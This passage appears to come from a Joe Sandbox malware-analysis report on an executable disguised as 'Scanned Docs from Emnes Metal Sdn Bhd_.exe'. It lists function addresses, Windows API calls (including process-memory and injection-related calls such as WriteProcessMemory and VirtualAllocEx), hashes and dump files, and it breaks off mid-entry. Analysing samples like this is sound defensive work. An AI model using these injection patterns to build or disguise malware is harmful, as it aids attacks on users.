                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: e547aeca7234cf3b0eb658f8b7b5e7b3e072d6a34e02e5fc65707f948397f183
                                                      • Instruction ID: 7bfd906871ae4d6627bfc8b42dc237b4194c59e7b7e6657845b264df309f2682
                                                      • Opcode Fuzzy Hash: e547aeca7234cf3b0eb658f8b7b5e7b3e072d6a34e02e5fc65707f948397f183
                                                      • Instruction Fuzzy Hash: 77F0CD39290312FBDB221FA5EC48F963BAEEF8D761F514424FE05C7250CA30D8608A60
                                                      Function 002F030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F0324
                                                      • CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F0331
                                                      • CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F033E
                                                      • CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F034B
                                                      • CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F0358
                                                      • CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F0365
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: adbd946d2b480d3bebe3d0493ce268e8f1af1ff0cc7b8cc7d909bfa0016b29de
                                                      • Instruction ID: 8e8728f3e52d46628387a3ffe3e808ef19f2249cf12acbb4071e792f7235e29f
                                                      • Opcode Fuzzy Hash: adbd946d2b480d3bebe3d0493ce268e8f1af1ff0cc7b8cc7d909bfa0016b29de
                                                      • Instruction Fuzzy Hash: 4801A276810B1A9FC7309F66D8C0826F7F9BF503553158A7FD29652932C371A964CF80
                                                      Function 002BD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 002BD752
                                                        • Part of subcall function 002B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000), ref: 002B29DE
                                                        • Part of subcall function 002B29C8: GetLastError.KERNEL32(00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000,00000000), ref: 002B29F0
                                                      • _free.LIBCMT ref: 002BD764
                                                      • _free.LIBCMT ref: 002BD776
                                                      • _free.LIBCMT ref: 002BD788
                                                      • _free.LIBCMT ref: 002BD79A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 974b096d3aa4a92c6f8be5c5dc76853de5c8d8665bd962b99fb5246a61e7278e
                                                      • Instruction ID: 84c926d33b6bf9d1d0bcc1be2c96401f056c9dc49eeb8da3e4a24729b6f5d03b
                                                      • Opcode Fuzzy Hash: 974b096d3aa4a92c6f8be5c5dc76853de5c8d8665bd962b99fb5246a61e7278e
                                                      • Instruction Fuzzy Hash: 94F04F36561705FB8662EF64F9C5CD6B7DDBB05390BA42C05F048DB502DF20FC908A64
                                                      Function 002E5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 002E5C58
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 002E5C6F
                                                      • MessageBeep.USER32(00000000), ref: 002E5C87
                                                      • KillTimer.USER32(?,0000040A), ref: 002E5CA3
                                                      • EndDialog.USER32(?,00000001), ref: 002E5CBD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: 8c011cb415c32820d56a1f75fb4164ac65a44fb65f4bbe77a960ef6a434427fb
                                                      • Instruction ID: fc54a1593124c729a7751ed707dda0953a4def768c714a0d8ead758bee56611f
                                                      • Opcode Fuzzy Hash: 8c011cb415c32820d56a1f75fb4164ac65a44fb65f4bbe77a960ef6a434427fb
                                                      • Instruction Fuzzy Hash: 1501D6305B0B14ABEB215B11DD5EFE677BCBF08B09F44215AB183A10E1DBF4A994CB90
                                                      Function 002B22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 002B22BE
                                                        • Part of subcall function 002B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000), ref: 002B29DE
                                                        • Part of subcall function 002B29C8: GetLastError.KERNEL32(00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000,00000000), ref: 002B29F0
                                                      • _free.LIBCMT ref: 002B22D0
                                                      • _free.LIBCMT ref: 002B22E3
                                                      • _free.LIBCMT ref: 002B22F4
                                                      • _free.LIBCMT ref: 002B2305
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: c4896b857bf0557211a9c4d7f2419d51be18e0de38f5d8dac2034a74dc683ef7
                                                      • Instruction ID: 1632eab2241c9f0b71ab934b71e7f82167b6eebe0fbc6d7dedfba4a95507985a
                                                      • Opcode Fuzzy Hash: c4896b857bf0557211a9c4d7f2419d51be18e0de38f5d8dac2034a74dc683ef7
                                                      • Instruction Fuzzy Hash: 15F05474421710DB8757AF54BC019983B6CF719792F152E06F418D6271CB3118259FE5
                                                      Function 002995C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 002995D4
                                                      • StrokeAndFillPath.GDI32(?,?,002D71F7,00000000,?,?,?), ref: 002995F0
                                                      • SelectObject.GDI32(?,00000000), ref: 00299603
                                                      • DeleteObject.GDI32 ref: 00299616
                                                      • StrokePath.GDI32(?), ref: 00299631
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: 1f671382b2d2b0bd1b6ecd192df1a1ad731230aff86862e81c9b3d5cf7305521
                                                      • Instruction ID: c6d965618ea841e8254e40f4fcb83864df27d2763b233b65d2f63eda3c8fc143
                                                      • Opcode Fuzzy Hash: 1f671382b2d2b0bd1b6ecd192df1a1ad731230aff86862e81c9b3d5cf7305521
                                                      • Instruction Fuzzy Hash: 2FF01431066309EBDB235F69ED18BA93B6DAB09332F048228F465950F0C73089A1DFA4
                                                      Function 002B0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: __freea$_free
                                                      • String ID: a/p$am/pm
                                                      • API String ID: 3432400110-3206640213
                                                      • Opcode ID: e1bae960ced78503275a20e3b65c5b1346b27d74871074a6ebab8823c5f6efc7
                                                      • Instruction ID: 941bc45bfae2274b51a74db94584d7e4e36700e17844e7bba55fb2f4fd9f82a0
                                                      • Opcode Fuzzy Hash: e1bae960ced78503275a20e3b65c5b1346b27d74871074a6ebab8823c5f6efc7
                                                      • Instruction Fuzzy Hash: 13D10431930207CACB249F68C865BFEB7F0EF05380FA84199EA059B651E7759DB0CB91
                                                      Function 003061D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002A0242: EnterCriticalSection.KERNEL32(0035070C,00351884,?,?,0029198B,00352518,?,?,?,002812F9,00000000), ref: 002A024D
                                                        • Part of subcall function 002A0242: LeaveCriticalSection.KERNEL32(0035070C,?,0029198B,00352518,?,?,?,002812F9,00000000), ref: 002A028A
                                                        • Part of subcall function 002A00A3: __onexit.LIBCMT ref: 002A00A9
                                                      • __Init_thread_footer.LIBCMT ref: 00306238
                                                        • Part of subcall function 002A01F8: EnterCriticalSection.KERNEL32(0035070C,?,?,00298747,00352514), ref: 002A0202
                                                        • Part of subcall function 002A01F8: LeaveCriticalSection.KERNEL32(0035070C,?,00298747,00352514), ref: 002A0235
                                                        • Part of subcall function 002F359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002F35E4
                                                        • Part of subcall function 002F359C: LoadStringW.USER32(00352390,?,00000FFF,?), ref: 002F360A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                      • String ID: x#5$x#5$x#5
                                                      • API String ID: 1072379062-943734617
                                                      • Opcode ID: b3bf9249751b197238771bc43784ff4cef253623578a4aa4e403c5f35238eb24
                                                      • Instruction ID: 84d0e76792b02bf6de1f99256960223a38f57e0a339988b40ca43927dd23c4d3
                                                      • Opcode Fuzzy Hash: b3bf9249751b197238771bc43784ff4cef253623578a4aa4e403c5f35238eb24
                                                      • Instruction Fuzzy Hash: 0FC1B071A01209AFCB15DF58C8A1EBEB7B9FF49300F158069F9059B295DB70ED64CB90
                                                      Function 002B8A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 002B8B6E
                                                      • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 002B8B7A
                                                      • __dosmaperr.LIBCMT ref: 002B8B81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                      • String ID: .*
                                                      • API String ID: 2434981716-1914541848
                                                      • Opcode ID: 99cd98fd006b50734ff25ef08c7ac71a6042067d9fdc59a5201b238d119df4e7
                                                      • Instruction ID: 0ae49d956b0d764d6333e683c664b15debfc0383ca770cbe50868dd9cfd1eda9
                                                      • Opcode Fuzzy Hash: 99cd98fd006b50734ff25ef08c7ac71a6042067d9fdc59a5201b238d119df4e7
                                                      • Instruction Fuzzy Hash: 6A417C70624145AFDB259F34CC90AF97FADDB45388F2885A9F89CC7152DE718C22C750
                                                      Function 002E2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002EB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002E21D0,?,?,00000034,00000800,?,00000034), ref: 002EB42D
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002E2760
                                                        • Part of subcall function 002EB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002E21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 002EB3F8
                                                        • Part of subcall function 002EB32A: GetWindowThreadProcessId.USER32(?,?), ref: 002EB355
                                                        • Part of subcall function 002EB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002E2194,00000034,?,?,00001004,00000000,00000000), ref: 002EB365
                                                        • Part of subcall function 002EB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002E2194,00000034,?,?,00001004,00000000,00000000), ref: 002EB37B
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002E27CD
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002E281A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: b1ec0844cb9587325edc2fde5229eb96d3700f9dd8ab874c43cc73edd8457465
                                                      • Instruction ID: a5e50d14d5664ed4cd76b9e8a590684984a9261a0a941e9a89e9fafa12adbe84
                                                      • Opcode Fuzzy Hash: b1ec0844cb9587325edc2fde5229eb96d3700f9dd8ab874c43cc73edd8457465
                                                      • Instruction Fuzzy Hash: 04415E72940218AFDB11DFA5CD42AEEBBB8EF09300F004095FA45B7181DB706E99CFA1
                                                      Function 002B172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe,00000104), ref: 002B1769
                                                      • _free.LIBCMT ref: 002B1834
                                                      • _free.LIBCMT ref: 002B183E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe
                                                      • API String ID: 2506810119-1030716471
                                                      • Opcode ID: a2ff863ac178163d39195058ac6180a4c30641b2b63802eddf88ad2e5b266a75
                                                      • Instruction ID: e47858c30e15bd6c52074abddc6faf3c812f763701e4182506bf49c497751728
                                                      • Opcode Fuzzy Hash: a2ff863ac178163d39195058ac6180a4c30641b2b63802eddf88ad2e5b266a75
                                                      • Instruction Fuzzy Hash: 5231A071A10308EBDB22DF999885DDEBBFCEB85390F644166F804D7211DB708E60DB90
                                                      Function 002EC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 002EC306
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 002EC34C
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00351990,00D35900), ref: 002EC395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem
                                                      • String ID: 0
                                                      • API String ID: 135850232-4108050209
                                                      • Opcode ID: 2ada9df9b366d100a7c0c1b27f393276481e3714a9b792b5e4897c789ec00168
                                                      • Instruction ID: d55d9c040c265301a32ab017c530ad2ec3b82a2ccec7f5ce4151a8d1406cdd43
                                                      • Opcode Fuzzy Hash: 2ada9df9b366d100a7c0c1b27f393276481e3714a9b792b5e4897c789ec00168
                                                      • Instruction Fuzzy Hash: 874103312543829FD720DF66D844F5ABBE8AF85310F6086ADF8A5972D1C730E815CB62
                                                      Function 00314416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0031CC08,00000000,?,?,?,?), ref: 003144AA
                                                      • GetWindowLongW.USER32 ref: 003144C7
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003144D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: d1d589933b15f78110134fde54e1a91ee8d232691768edff38c2c4c6d69094a4
                                                      • Instruction ID: 6502a1e37ef88888bbf0596919732defaae95612c4c7332eeda79bd70a8b7779
                                                      • Opcode Fuzzy Hash: d1d589933b15f78110134fde54e1a91ee8d232691768edff38c2c4c6d69094a4
                                                      • Instruction Fuzzy Hash: 76319C31210205ABDB269E38DC45BEA7BA9EB0D334F214325F975921E0DB70ECA09B50
                                                      Function 002E6E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SysReAllocString.OLEAUT32(?,?), ref: 002E6EED
                                                      • VariantCopyInd.OLEAUT32(?,?), ref: 002E6F08
                                                      • VariantClear.OLEAUT32(?), ref: 002E6F12
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyString
                                                      • String ID: *j.
                                                      • API String ID: 2173805711-2304742598
                                                      • Opcode ID: 3a35a5ef7c4314587963e8c8933634528c300be6bca9916a2cbc3ec6cf494197
                                                      • Instruction ID: db45b4d92c25253954ab472fc24f59650800a3fa388e6f794614f9fcb38444cb
                                                      • Opcode Fuzzy Hash: 3a35a5ef7c4314587963e8c8933634528c300be6bca9916a2cbc3ec6cf494197
                                                      • Instruction Fuzzy Hash: 1031F375625285DFCB06AF65E8548BD3775FF65340B600498F8034B6A1CB749931CFD0
                                                      Function 0030304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0030335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00303077,?,?), ref: 00303378
                                                      • inet_addr.WSOCK32(?), ref: 0030307A
                                                      • _wcslen.LIBCMT ref: 0030309B
                                                      • htons.WSOCK32(00000000), ref: 00303106
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                      • String ID: 255.255.255.255
                                                      • API String ID: 946324512-2422070025
                                                      • Opcode ID: 66ca5031d8541d945a12c324c3a40c6b8f377d00ca35750d57f5a432ab7d60cb
                                                      • Instruction ID: 048ebac606990f42facfff4f5187467b5b9225bc20edfea04bd3c67cbd4ef996
